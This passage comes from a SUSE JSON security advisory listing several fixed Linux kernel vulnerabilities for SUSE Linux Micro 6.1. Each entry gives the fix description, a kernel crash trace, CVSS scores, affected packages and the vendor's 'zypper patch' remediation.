"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54164",
"url": "https://www.suse.com/security/cve/CVE-2023-54164"
},
{
"category": "external",
"summary": "SUSE Bug 1256071 for CVE-2023-54164",
"url": "https://bugzilla.suse.com/1256071"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54164"
},
{
"cve": "CVE-2023-54166",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54166"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nigc: Fix Kernel Panic during ndo_tx_timeout callback\n\nThe Xeon validation group has been carrying out some loaded tests\nwith various HW configurations, and they have seen some transmit\nqueue time out happening during the test. This will cause the\nreset adapter function to be called by igc_tx_timeout().\nSimilar race conditions may arise when the interface is being brought\ndown and up in igc_reinit_locked(), an interrupt being generated, and\nigc_clean_tx_irq() being called to complete the TX.\n\nWhen the igc_tx_timeout() function is invoked, this patch will turn\noff all TX ring HW queues during igc_down() process. TX ring HW queues\nwill be activated again during the igc_configure_tx_ring() process\nwhen performing the igc_up() procedure later.\n\nThis patch also moved existing igc_disable_tx_ring_hw() to avoid using\nforward declaration.\n\nKernel trace:\n[ 7678.747813] ------------[ cut here ]------------\n[ 7678.757914] NETDEV WATCHDOG: enp1s0 (igc): transmit queue 2 timed out\n[ 7678.770117] WARNING: CPU: 0 PID: 13 at net/sched/sch_generic.c:525 dev_watchdog+0x1ae/0x1f0\n[ 7678.784459] Modules linked in: xt_conntrack nft_chain_nat xt_MASQUERADE xt_addrtype nft_compat\nnf_tables nfnetlink br_netfilter bridge stp llc overlay dm_mod emrcha(PO) emriio(PO) rktpm(PO)\ncegbuf_mod(PO) patch_update(PO) se(PO) sgx_tgts(PO) mktme(PO) keylocker(PO) svtdx(PO) svfs_pci_hotplug(PO)\nvtd_mod(PO) davemem(PO) svmabort(PO) svindexio(PO) usbx2(PO) ehci_sched(PO) svheartbeat(PO) ioapic(PO)\nsv8259(PO) svintr(PO) lt(PO) pcierootport(PO) enginefw_mod(PO) ata(PO) smbus(PO) spiflash_cdf(PO) arden(PO)\ndsa_iax(PO) oobmsm_punit(PO) cpm(PO) svkdb(PO) ebg_pch(PO) pch(PO) sviotargets(PO) svbdf(PO) svmem(PO)\nsvbios(PO) dram(PO) svtsc(PO) targets(PO) superio(PO) svkernel(PO) cswitch(PO) mcf(PO) pentiumIII_mod(PO)\nfs_svfs(PO) mdevdefdb(PO) svfs_os_services(O) ixgbe mdio mdio_devres libphy emeraldrapids_svdefs(PO)\nregsupport(O) libnvdimm nls_cp437 snd_hda_codec_realtek snd_hda_codec_generic ledtrig_audio snd_hda_intel\nsnd_intel_dspcfg snd_hda_codec snd_hwdep x86_pkg_temp_thermal snd_hda_core snd_pcm snd_timer isst_if_mbox_pci\n[ 7678.784496] input_leds isst_if_mmio sg snd isst_if_common soundcore wmi button sad9(O) drm fuse backlight\nconfigfs efivarfs ip_tables x_tables vmd sdhci led_class rtl8150 r8152 hid_generic pegasus mmc_block usbhid\nmmc_core hid megaraid_sas ixgb igb i2c_algo_bit ice i40e hpsa scsi_transport_sas e1000e e1000 e100 ax88179_178a\nusbnet xhci_pci sd_mod xhci_hcd t10_pi crc32c_intel crc64_rocksoft igc crc64 crc_t10dif usbcore\ncrct10dif_generic ptp crct10dif_common usb_common pps_core\n[ 7679.200403] RIP: 0010:dev_watchdog+0x1ae/0x1f0\n[ 7679.210201] Code: 28 e9 53 ff ff ff 4c 89 e7 c6 05 06 42 b9 00 01 e8 17 d1 fb ff 44 89 e9 4c\n89 e6 48 c7 c7 40 ad fb 81 48 89 c2 e8 52 62 82 ff \u003c0f\u003e 0b e9 72 ff ff ff 65 8b 05 80 7d 7c 7e\n89 c0 48 0f a3 05 0a c1\n[ 7679.245438] RSP: 0018:ffa00000001f7d90 EFLAGS: 00010282\n[ 7679.256021] RAX: 0000000000000000 RBX: ff11000109938440 RCX: 0000000000000000\n[ 7679.268710] RDX: ff11000361e26cd8 RSI: ff11000361e1b880 RDI: ff11000361e1b880\n[ 7679.281314] RBP: ffa00000001f7da8 R08: ff1100035f8fffe8 R09: 0000000000027ffb\n[ 7679.293840] R10: 0000000000001f0a R11: ff1100035f840000 R12: ff11000109938000\n[ 7679.306276] R13: 0000000000000002 R14: dead000000000122 R15: ffa00000001f7e18\n[ 7679.318648] FS: 0000000000000000(0000) GS:ff11000361e00000(0000) knlGS:0000000000000000\n[ 7679.332064] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 7679.342757] CR2: 00007ffff7fca168 CR3: 000000013b08a006 CR4: 0000000000471ef8\n[ 7679.354984] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 7679.367207] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 7679.379370] PKRU: 55555554\n[ 7679.386446] Call Trace:\n[ 7679.393152] \u003cTASK\u003e\n[ 7679.399363] ? __pfx_dev_watchdog+0x10/0x10\n[ 7679.407870] call_timer_fn+0x31/0x110\n[ 7679.415698] e\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54166",
"url": "https://www.suse.com/security/cve/CVE-2023-54166"
},
{
"category": "external",
"summary": "SUSE Bug 1256074 for CVE-2023-54166",
"url": "https://bugzilla.suse.com/1256074"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54166"
},
{
"cve": "CVE-2023-54169",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54169"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: fix memory leak in mlx5e_ptp_open\n\nWhen kvzalloc_node or kvzalloc failed in mlx5e_ptp_open, the memory\npointed by \"c\" or \"cparams\" is not freed, which can lead to a memory\nleak. Fix by freeing the array in the error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54169",
"url": "https://www.suse.com/security/cve/CVE-2023-54169"
},
{
"category": "external",
"summary": "SUSE Bug 1256050 for CVE-2023-54169",
"url": "https://bugzilla.suse.com/1256050"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54169"
},
{
"cve": "CVE-2023-54170",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54170"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nkeys: Fix linking a duplicate key to a keyring\u0027s assoc_array\n\nWhen making a DNS query inside the kernel using dns_query(), the request\ncode can in rare cases end up creating a duplicate index key in the\nassoc_array of the destination keyring. It is eventually found by\na BUG_ON() check in the assoc_array implementation and results in\na crash.\n\nExample report:\n[2158499.700025] kernel BUG at ../lib/assoc_array.c:652!\n[2158499.700039] invalid opcode: 0000 [#1] SMP PTI\n[2158499.700065] CPU: 3 PID: 31985 Comm: kworker/3:1 Kdump: loaded Not tainted 5.3.18-150300.59.90-default #1 SLE15-SP3\n[2158499.700096] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020\n[2158499.700351] Workqueue: cifsiod cifs_resolve_server [cifs]\n[2158499.700380] RIP: 0010:assoc_array_insert+0x85f/0xa40\n[2158499.700401] Code: ff 74 2b 48 8b 3b 49 8b 45 18 4c 89 e6 48 83 e7 fe e8 95 ec 74 00 3b 45 88 7d db 85 c0 79 d4 0f 0b 0f 0b 0f 0b e8 41 f2 be ff \u003c0f\u003e 0b 0f 0b 81 7d 88 ff ff ff 7f 4c 89 eb 4c 8b ad 58 ff ff ff 0f\n[2158499.700448] RSP: 0018:ffffc0bd6187faf0 EFLAGS: 00010282\n[2158499.700470] RAX: ffff9f1ea7da2fe8 RBX: ffff9f1ea7da2fc1 RCX: 0000000000000005\n[2158499.700492] RDX: 0000000000000000 RSI: 0000000000000005 RDI: 0000000000000000\n[2158499.700515] RBP: ffffc0bd6187fbb0 R08: ffff9f185faf1100 R09: 0000000000000000\n[2158499.700538] R10: ffff9f1ea7da2cc0 R11: 000000005ed8cec8 R12: ffffc0bd6187fc28\n[2158499.700561] R13: ffff9f15feb8d000 R14: ffff9f1ea7da2fc0 R15: ffff9f168dc0d740\n[2158499.700585] FS: 0000000000000000(0000) GS:ffff9f185fac0000(0000) knlGS:0000000000000000\n[2158499.700610] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[2158499.700630] CR2: 00007fdd94fca238 CR3: 0000000809d8c006 CR4: 00000000003706e0\n[2158499.700702] Call Trace:\n[2158499.700741] ? key_alloc+0x447/0x4b0\n[2158499.700768] ? __key_link_begin+0x43/0xa0\n[2158499.700790] __key_link_begin+0x43/0xa0\n[2158499.700814] request_key_and_link+0x2c7/0x730\n[2158499.700847] ? dns_resolver_read+0x20/0x20 [dns_resolver]\n[2158499.700873] ? key_default_cmp+0x20/0x20\n[2158499.700898] request_key_tag+0x43/0xa0\n[2158499.700926] dns_query+0x114/0x2ca [dns_resolver]\n[2158499.701127] dns_resolve_server_name_to_ip+0x194/0x310 [cifs]\n[2158499.701164] ? scnprintf+0x49/0x90\n[2158499.701190] ? __switch_to_asm+0x40/0x70\n[2158499.701211] ? __switch_to_asm+0x34/0x70\n[2158499.701405] reconn_set_ipaddr_from_hostname+0x81/0x2a0 [cifs]\n[2158499.701603] cifs_resolve_server+0x4b/0xd0 [cifs]\n[2158499.701632] process_one_work+0x1f8/0x3e0\n[2158499.701658] worker_thread+0x2d/0x3f0\n[2158499.701682] ? process_one_work+0x3e0/0x3e0\n[2158499.701703] kthread+0x10d/0x130\n[2158499.701723] ? kthread_park+0xb0/0xb0\n[2158499.701746] ret_from_fork+0x1f/0x40\n\nThe situation occurs as follows:\n* Some kernel facility invokes dns_query() to resolve a hostname, for\n example, \"abcdef\". The function registers its global DNS resolver\n cache as current-\u003ecred.thread_keyring and passes the query to\n request_key_net() -\u003e request_key_tag() -\u003e request_key_and_link().\n* Function request_key_and_link() creates a keyring_search_context\n object. Its match_data.cmp method gets set via a call to\n type-\u003ematch_preparse() (resolves to dns_resolver_match_preparse()) to\n dns_resolver_cmp().\n* Function request_key_and_link() continues and invokes\n search_process_keyrings_rcu() which returns that a given key was not\n found. The control is then passed to request_key_and_link() -\u003e\n construct_alloc_key().\n* Concurrently to that, a second task similarly makes a DNS query for\n \"abcdef.\" and its result gets inserted into the DNS resolver cache.\n* Back on the first task, function construct_alloc_key() first runs\n __key_link_begin() to determine an assoc_array_edit operation to\n insert a new key. Index keys in the array are compared exactly as-is,\n using keyring_compare_object(). The operation \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54170",
"url": "https://www.suse.com/security/cve/CVE-2023-54170"
},
{
"category": "external",
"summary": "SUSE Bug 1256045 for CVE-2023-54170",
"url": "https://bugzilla.suse.com/1256045"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54170"
},
{
"cve": "CVE-2023-54171",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54171"
}
],
"notes": [
{
"category": "general",
